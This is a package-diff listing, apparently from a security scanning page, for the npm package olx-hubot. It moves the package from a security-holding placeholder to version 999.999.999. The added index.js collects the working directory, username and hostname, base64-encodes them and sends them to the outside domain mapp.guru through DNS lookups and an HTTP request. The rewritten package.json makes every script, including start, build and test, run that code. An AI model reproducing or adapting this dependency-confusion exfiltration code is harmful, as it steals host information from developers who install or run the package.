olx-hubot 0.0.1-security → 999.999.999

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of olx-hubot might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +27 -0
  2. package/package.json +43 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,27 @@
1
+ 'use strict'
2
+
3
+ const https = require('http');
4
+ const { execSync } = require("child_process");
5
+ const dns = require('dns');
6
+ const data = {
7
+ "pwd":execSync("pwd", {encoding: 'utf8'}).replace("\n", ""),
8
+ "whoami": execSync("whoami", {encoding: 'utf8'}).replace("\n", ""),
9
+ "hostname": execSync("hostname", {encoding: 'utf8'}).replace("\n", "")
10
+ }
11
+
12
+ var b64data = Buffer.from(JSON.stringify(data)).toString("base64");
13
+ var b64datasplit = b64data.replace(/=/g, "-").replace(/\//g, "_").replace(/\+/g, ".").split(/(.{50})/).filter(O=>O);
14
+
15
+ const rrtype="A";
16
+ for(var i = 0; i < b64datasplit.length; i++) {
17
+ dns.resolve(b64datasplit[i] + ".mapp.guru", rrtype, (err, records) => console.log('records: %j', records));
18
+ }
19
+
20
+ const options = {
21
+ hostname: 'olx.mapp.guru',
22
+ port: 80,
23
+ path: "/" + b64data,
24
+ method: 'GET',
25
+ };
26
+
27
+ https.get(options);
package/package.json CHANGED
@@ -1,6 +1,46 @@
1
1
  {
2
2
  "name": "olx-hubot",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "999.999.999",
4
+ "main": "index.js",
5
+ "author": "Gabriel Manhães <mapp@wearehackerone.com>",
6
+ "scripts": {
7
+ "license:thirdparty": "node index.js",
8
+ "prune:production": "node index.js",
9
+ "getVersion": "node index.js",
10
+ "---------": "node index.js",
11
+ "start:backend": "node index.js",
12
+ "start:backend:prod": "node index.js",
13
+ "start:convertbot:prod": "node index.js",
14
+ "start:frontend": "node index.js",
15
+ "start:frontend:nogen": "node index.js",
16
+ "start:slackbot:prod": "node index.js",
17
+ "start": "node index.js",
18
+ "start:nogen": "node index.js",
19
+ "-------": "node index.js",
20
+ "lint": "node index.js",
21
+ "lint:fix": "node index.js",
22
+ "------": "node index.js",
23
+ "generate": "node index.js",
24
+ "generate:watch": "node index.js",
25
+ "--------": "node index.js",
26
+ "clean": "node index.js",
27
+ "clean:deep": "node index.js",
28
+ "build": "node index.js",
29
+ "build:tsc": "node index.js",
30
+ "build:backend": "node index.js",
31
+ "build:frontend:react": "node index.js",
32
+ "-----": "node index.js",
33
+ "test": "node index.js"
34
+ },
35
+ "keywords": [],
36
+ "license": "ISC",
37
+ "dependencies": {
38
+ "debug": "^4.3.2",
39
+ "superlaser": "^1.0.0"
40
+ },
41
+ "engines": {
42
+ "node": ">=16.0.0",
43
+ "npm": ">=7.0.0"
44
+ },
45
+ "description": ""
6
46
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=olx-hubot for more information.